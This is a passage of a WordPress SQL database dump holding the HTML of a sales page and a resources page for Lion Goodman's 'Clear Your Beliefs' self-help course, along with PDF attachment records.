Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>\r\njQuery(document).ready(function() { \r\nvar is_chrome = window.chrome; \r\n if (is_chrome) { \r\njQuery(''h5.hdr'').css(''text-size'', ''51px!important'');\r\n jQuery(''h5.hdr'').animate({\r\n    fontSize: ''51px''\r\n }, 100);\r\n } \r\n});\r\n</script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:58:41', '2014-06-18 02:58:41', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2086, 2, '2017-01-09 14:44:48', '2017-01-09 19:44:48', '<div style="margin-left: 28px; width: 860px;">\n<h1 style="text-align: center;">Thank You for Registering for\n<em>Clear Your Beliefs\n</em></h1>\n&nbsp;\n\nThis page contains all of the resources you need to take yourself through this breakthrough program.\n\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\n\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\n\nWelcome to Clear Your Beliefs!\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\n\n&nbsp;\n<h6>Lion Goodman\nFounder</h6>\n<h1></h1>\n<h1>The Guidebook</h1>\nDownload and read first:   <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/The-Clear-Your-Beliefs-Guidebook.pdf" target="_blank">The Clear Your Beliefs Guidebook</a>\n(Right-mouse-click and "Save As..." to your computer.\n<h1>Audio Recordings</h1>\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\n<h1>Session 1:</h1>\n<strong>1.1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/1-01_Introduction_to_Clear_Your_Beliefs_by_Lion_Goodman.mp3" target="_blank">Introduction to Clear Your Beliefs</a> with Lion Goodman</strong>\n\n<strong>1.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/1-02-BeliefCloset_Process_-_Pull_All_the_Old_Junk_Out_of_Your_BeliefCloset-plus-Lesson.mp3" target="_blank">Pull All the Old Junk Out of Your BeliefCloset (audio and lesson)</a></strong>\n\n<strong>1.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/1-04_Session_1_Bonus_-_Live_Questions___Answers.mp3" target="_blank">Bonus: Live Q &amp;A </strong></a>\n\n<strong>1.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_1_Transcripts_-_Clear_Your_Beliefs.pdf" target="_blank">Transcript: Pull All the Old Junk Out of Your BeliefCloset</strong></a>\n\n  \n<h1>Session 2:</h1>\n\n<strong>2.1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/2-01_Clear_Your_Negative_Beliefs_About_Who_You_Are.mp3" target="_blank">Clear Your Negative Beliefs About Who You Are</strong></a>\n\n<strong>2.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/2-02_BeliefCloset_Process_-_Clear_Your_Negative_Beliefs_About_Who_You_Are.mp3" target="_blank">Lesson: Clear Your Negative Beliefs About Who You Are</strong></a>\n\n<strong>2.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/2-03_Session_2_Bonus_-_Live_Questions___Answers.mp3" target="_blank"> Bonus: Live Q &amp;A </strong></a>\n\n<strong>2.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_2_Transcripts_-_Clear_Your_Beliefs__.pdf" target="_blank">Transcript: Clear Your Negative Beliefs About Who You Are</strong></a>\n\n\n<h1>Session 3:</h1>\n<strong>3.1: </strong><a href="https://s3-us-west-2.amazonaws.com/cyb/new/3-01_Clear_Your_Limiting_Beliefs_About_Your_Capabilities.mp3" target="_blank"><strong>Clear Your Limiting Beliefs About Your Capabilities</strong></a>\n\n<strong>3.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/3-02_Meditation_-_Clear_Your_Beliefs_About_Your_Capabilities.mp3" target="_blank">Meditation: Clear Your Limiting Beliefs About Your Capabilities</strong></a>\n\n<strong>3.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/3-03_Lesson_-_Clear_Your_Beliefs_About_Your_Capabilities.mp3" target="_blank">Lesson: Clear Your Limiting Beliefs About Your Capabilities</strong></a>\n\n<strong>3.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/3-04_BeliefCloset_Process_-_Clear_Your_Limiting_Beliefs_About_Your_Capabilities.mp3" target="_blank">Continued...Clear Your Limiting Beliefs About Your Capabilities</strong></a>\n\n<strong>3.5: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/3-05_Session_3_Bonus_-_Live_Questions___Answers.mp3" target="_blank">Bonus: Live Q &amp;A</strong></a>\n\n<strong>3.6: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_3_Transcripts_Clear_Your_Beliefs.pdf" target="_blank">Transcript: Clear Your Limiting Beliefs About Your Capabilities</strong></a>\n\n\n<h1>Session 4:</h1>\n<strong>4.1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/4-01_Clear_Your_Outdated_Beliefs_About_Love___Relationship.mp3" target="_blank">Clear Your Outdated Beliefs About Love &amp; Relationship</strong></a>\n\n<strong>4.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/4-02_Meditation_-_Clear_Your_Outdated_Beliefs_About_Love___Relationship.mp3" target="_blank">Meditation: Clear Your Outdated Beliefs About Love &amp; Relationship</strong></a>\n\n<strong>4.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/4-03_Lesson_-_Clear_Your_Outdated_Beliefs_About_Love___Relationship.mp3" target="_blank">Lesson: Clear Your Outdated Beliefs About Love &amp; Relationship</strong></a>\n\n<strong>4.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/4-04_BeliefCloset_Process_-_Clear_Your_Outdated_Beliefs_About_Love___Relationship.mp3" target="_blank">Continued...Clear Your Outdated Beliefs About Love &amp; Relationship</strong></a>\n\n<strong>4.5: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/4-05_Session_4_Bonus_-_Live_Questions_and_Answers.mp3" target="_blank">Bonus: Live Q &amp;A</strong></a>\n\n<strong>4.6: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_4_Transcripts_-_Clear_Your_Beliefs.pdf" target="_blank">Transcript: Clear Your Outdated Beliefs About Love &amp; Relationship</strong></a>\n\n\n\n<h1>Session 5:</h1>\n\n<strong>5.1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/5-01_Clear_Your_Old_Beliefs_About_Money_and_Work.mp3" target="_blank">Clear Your Old Beliefs About Money and Work</strong></a>\n\n<strong>5.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/5-02_Meditation_-_Clear_Your_Old_Beliefs_About_Money_and_Work.mp3" target="_blank">Meditation: Clear Your Old Beliefs About Money and Work</strong></a>\n\n<strong>5.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/5-03_Lesson_-_Clear_Your_Old_Beliefs_About_Money_and_Work.mp3" target="_blank">Lesson: Clear Your Old Beliefs About Money and Work</strong></a>\n\n<strong>5.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/5-04_BeliefCloset_Process_-_Clear_Your_Old_Beliefs_About_Money_and_Work.mp3" target="_blank">Continued...Clear Your Old Beliefs About Money and Work</strong></a>\n\n<strong>5.5: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/5-05_Lesson_and_Bonus_-_Clear_Your_Old_Beliefs_About_Money_and_Work.mp3" target="_blank">Lesson & Bonus: Live Q &amp;A</strong></a>\n\n<strong>5.6: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_5_Transcripts_-_Clear_Your_Beliefs.pdf" target="_blank">Transcript: Clear Your Old Beliefs About Money and Work</strong></a>\n\n\n<h1>Session 6:</h1>\n\n<strong>6.1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/6-01_Clear_Uncomfortable_Beliefs_About_Your_Body___Health.mp3" target="_blank">Clear Uncomfortable Beliefs About Your Body &amp; Health</strong></a>\n\n<strong>6.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/6-02_BeliefCloset_Process_-_Clear_Uncomfortable_Beliefs_About_Your_Body___Health.mp3" target="_blank">Continued...Clear Uncomfortable Beliefs About Your Body &amp; Health</strong></a>\n\n<strong>6.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/6-03_Lesson_-_Clear_Uncomfortable_Beliefs_About_Your_Body___Health.mp3" target="_blank">Lesson: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong></a>\n\n<strong>6.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/6-04_Body-Wisdom_Process.mp3" target="_blank">Body Wisdom Process</strong></a>\n\n<strong>6.5: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/6-05_Session_6_Bonus_-_Live_Questions_and_Answers.mp3" target="_blank">Lesson & Bonus: Live Q &amp;A</strong></a>\n\n<strong>6.6: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_6_Transcripts_-_Clear_Your_Beliefs.pdf" target="_blank">Transcript: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong></a>\n\n\n<h1>Session 7:</h1>\n\n<strong>7.1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/7-01_Clear_Out_the_Rest_of_the_Junk_in_Your_BeliefCloset.mp3" target="_blank">Clear Out the Rest of the Junk in Your BeliefCloset</strong></a>\n\n<strong>7.2: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/7-02_BeliefCloset_Process_-_Clear_Out_the_Rest_of_the_Junk_in_Your_BeliefCloset.mp3" target="_blank">Continued...Clear Out the Rest of the Junk in Your BeliefCloset</strong></a>\n\n<strong>7.3: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/7-03_Lesson_-_Clear_Out_the_Rest_of_the_Junk_in_Your_BeliefCloset.mp3" target="_blank">Lesson: Clear Out the Rest of the Junk in Your BeliefCloset</strong></a>\n\n<strong>7.4: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/7-04_Session_7_Bonus_-_Live_Questions___Answers.mp3" target="_blank">Lesson & Bonus: Live Q &amp;A</strong></a>\n\n<strong>7.5: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/Session_7_Transcripts_-Clear_Your_Beliefs.pdf" target="_blank">Transcript: Clear Out the Rest of the Junk in Your BeliefCloset</strong></a>\n\n\n<h1>Bonuses:</h1>\n<strong>Bonus Call 1: <a href="https://s3-us-west-2.amazonaws.com/cyb/new/8-01_Clear_Your_Beliefs_Bonus_Call_with_Lion_Goodman_and_Anodea_Judity.mp3" target="_blank">Anodea Judith on Manifesting with Beliefs</strong></a>\n\n<strong>Bonus Call 2: <a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3" target="_blank">Carista Luminare, Ph.D. on Love and Relationships. What Makes Love So Confusing? </strong>\n</a>\n\n\n<h1>Bonus Materials:</h1>\n\n<strong>The Belief Self-Diagnosis Exercise: </strong>(First read and do Part 1. Then read and do Part 2.)\n\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf" target="_blank">CYB Belief Self-Diagnosis Exercise 2014</a> (Part 1)</strong>\n\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf" target="_blank">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\n<p style="text-align: center;">. . .</p>\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/" target="_blank">HERE</a></strong>.  Or paste this url into your browser:<strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/</strong>\n<p style="text-align: center;">. . .</p>\n<strong>Download the multimedia eBook, "Clear Your Beliefs"</strong> by Lion Goodman, by clicking here: <strong><a href="http://clearyourbeliefs.com/CYB-ebook" target="_blank">http://www.clearyourbeliefs.com/CYB-ebook</a></strong>\n<p style="text-align: center;">. . .</p>\n<p style="text-align: left;"><strong>Read the first two chapters</strong> of <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras</em> by Anodea Judith and Lion Goodman.  PDF: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf" target="_blank">Creating_On_Purpose_SampleChapters</a></p>\n&nbsp;\n\n</div>\n<p style="text-align: center;">. . .</p>\nPlease feel free to get in touch anytime if we can be of assistance during your journey. If you feel stuck along the way, or if it''s not working for you, contact Lion by email at liongoodman@gmail.com. If it''s a serious problem and you need help right away, call Lion''s office at 1-707-971-7947. And of course, we would love to hear from you if things are going well! Send us periodic reports about your progress and breakthroughs!\n.\n\n<span style="border-radius: 2px; text-indent: 20px; width: auto; padding: 0px 4px 0px 0px; text-align: center; font: bold 11px/20px ''Helvetica Neue'',Helvetica,sans-serif; color: #ffffff; background: #bd081c  no-repeat scroll 3px 50% / 14px 14px; position: absolute; opacity: 1; z-index: 8675309; display: none; cursor: pointer;">Save</span>', 'Resources', '', 'inherit', 'closed', 'open', '', '139-autosave-v1', '', '', '2017-01-09 14:44:48', '2017-01-09 19:44:48', '', 139, 'http://clearyourbeliefs.com/139-autosave-v1', 0, 'revision', '', 0),
(1013, 2, '2014-06-18 15:07:42', '2014-06-18 20:07:42', '', 'CYB Bonus 1 CL', '', 'inherit', 'closed', 'open', '', 'cyb-bonus-1-cl', '', '', '2014-06-18 15:07:42', '2014-06-18 20:07:42', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf', 0, 'attachment', 'application/pdf', 0),
(1014, 2, '2014-06-18 15:07:47', '2014-06-18 20:07:47', '', 'CYB Bonus 2 AJ', '', 'inherit', 'closed', 'open', '', 'cyb-bonus-2-aj', '', '', '2014-06-18 15:07:47', '2014-06-18 20:07:47', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf', 0, 'attachment', 'application/pdf', 0),
(1015, 2, '2014-06-18 15:07:51', '2014-06-18 20:07:51', '', 'CYB-7', '', 'inherit', 'closed', 'open', '', 'cyb-7', '', '', '2014-06-18 15:07:51', '2014-06-18 20:07:51', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf', 0, 'attachment', 'application/pdf', 0),
(1016, 2, '2014-06-18 15:07:54', '2014-06-18 20:07:54', '', 'CYB-6', '', 'inherit', 'closed', 'open', '', 'cyb-6', '', '', '2014-06-18 15:07:54', '2014-06-18 20:07:54', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf', 0, 'attachment', 'application/pdf', 0),
(1017, 2, '2014-06-18 15:07:57', '2014-06-18 20:07:57', '', 'CYB-5', '', 'inherit', 'closed', 'open', '', 'cyb-5', '', '', '2014-06-18 15:07:57', '2014-06-18 20:07:57', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf', 0, 'attachment', 'application/pdf', 0),
(1018, 2, '2014-06-18 15:07:59', '2014-06-18 20:07:59', '', 'CYB-4', '', 'inherit', 'closed', 'open', '', 'cyb-4', '', '', '2014-06-18 15:07:59', '2014-06-18 20:07:59', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf', 0, 'attachment', 'application/pdf', 0),
(1019, 2, '2014-06-18 15:08:01', '2014-06-18 20:08:01', '', 'CYB-3', '', 'inherit', 'closed', 'open', '', 'cyb-3', '', '', '2014-06-18 15:08:01', '2014-06-18 20:08:01', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf', 0, 'attachment', 'application/pdf', 0),
